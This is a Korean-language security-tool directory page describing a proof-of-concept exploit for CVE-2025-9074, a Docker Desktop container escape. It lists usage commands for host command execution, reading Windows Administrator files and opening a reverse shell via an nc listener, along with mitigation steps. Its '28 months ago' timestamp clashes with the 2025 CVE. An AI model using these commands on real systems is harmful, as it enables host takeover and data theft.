Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — CVE-2025-9074에 대한 개념 증명 익스플로잇 - Windows 및 macOS에서 Docker Desktop < 4.44.3에 영향을 미치는 인증되지 않은 Docker Engine API 컨테이너 탈출 (CVSS 9.3) | Kitploit
도구/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Container SecurityVulnerability AnalysisExploitationPenetration TestingCloud SecurityRed TeamingContainer Escape
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-9074-Docker-Desktop-Container-Escape

CVE-2025-9074에 대한 개념 증명 익스플로잇 - Windows 및 macOS에서 Docker Desktop < 4.44.3에 영향을 미치는 인증되지 않은 Docker Engine API 컨테이너 탈출 (CVSS 9.3)

저장소 보기
28개월 전아직 검토되지 않음

CVE-2025-9074: Docker Desktop 컨테이너 탈출 PoC

CVE CVSS Platform

CVE-2025-9074에 대한 개념 증명 익스플로잇 - Docker Desktop에서 인증 없이 Docker Engine API에 접근할 수 있는 중요한 컨테이너 탈출 취약점입니다.

취약점 개요

속성값
CVE IDCVE-2025-9074
CVSS 점수9.3 (심각)
영향받는 소프트웨어Docker Desktop < 4.44.3
영향받는 플랫폼Windows, macOS (Linux 영향 없음)
수정 버전Docker Desktop 4.44.3+
발견자Felix Boulet, Philippe Dugré
발견 날짜2025년 중반
패치 날짜2025년 8월 20일

기술 세부 사항

이 취약점으로 인해 Docker Desktop에서 실행 중인 컨테이너가 http://192.168.65.7:2375에서 Docker Engine API에 인증 없이 접근할 수 있습니다. 이는 다음 설정과 관계없이 발생합니다:

  • ECI(Enhanced Container Isolation) 설정
  • "Expose daemon on tcp://localhost:2375 without TLS" 구성
  • 기타 모든 보안 설정

영향

  • Windows (WSL 백엔드): 관리자 권한으로 전체 호스트 장악
  • macOS: 컨테이너 조작 및 잠재적 백도어 설치 (사용자 프롬프트로 제한됨)
  • Linux: 취약하지 않음 (TCP 대신 Unix 소켓 사용)

근본 원인

Docker Engine API가 컨테이너 내부에서 접근 가능한 TCP 소켓에 노출되어 다음이 가능했습니다:

  • 컨테이너 생성/삭제
  • 호스트 파일 시스템 마운트
  • 권한 있는 명령 실행
  • 컨테이너 격리 완전 우회

사용법

image

사전 요구 사항

root@kitploit:~
pip3 install requests

명령 실행 모드

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

리버스 셸 모드

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

컨테이너 내부에서 실행

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

공격 시나리오

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

완화 조치

즉시 필요한 조치

즉시 Docker Desktop 4.44.3 이상으로 업데이트하십시오.

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

해결 방법 (임시)

즉시 업데이트가 불가능한 경우:

  1. 신뢰할 수 없는 컨테이너 실행 방지
  2. 컨테이너의 네트워크 연결 모니터링
  3. 네트워크 분할 구현
  4. 배포 전 모든 컨테이너 이미지 검토

참고 자료

  • Docker 보안 권고
  • NVD CVE-2025-9074
  • Felix Boulet의 블로그
  • Philippe Dugré의 분석
  • GitHub 권고

면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

  • 소유하거나 테스트할 명시적 권한이 있는 시스템에만 사용하십시오.
  • 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
  • 저자는 이 소프트웨어의 오용에 대해 책임을 지지 않습니다.

크레딧

  • 취약점 발견: Felix Boulet, Philippe Dugré
  • PoC 개발: Amanja Francisco
  • Docker 보안 팀: 신속한 대응 및 패치 제공

라이선스

MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하십시오.

도구 다운로드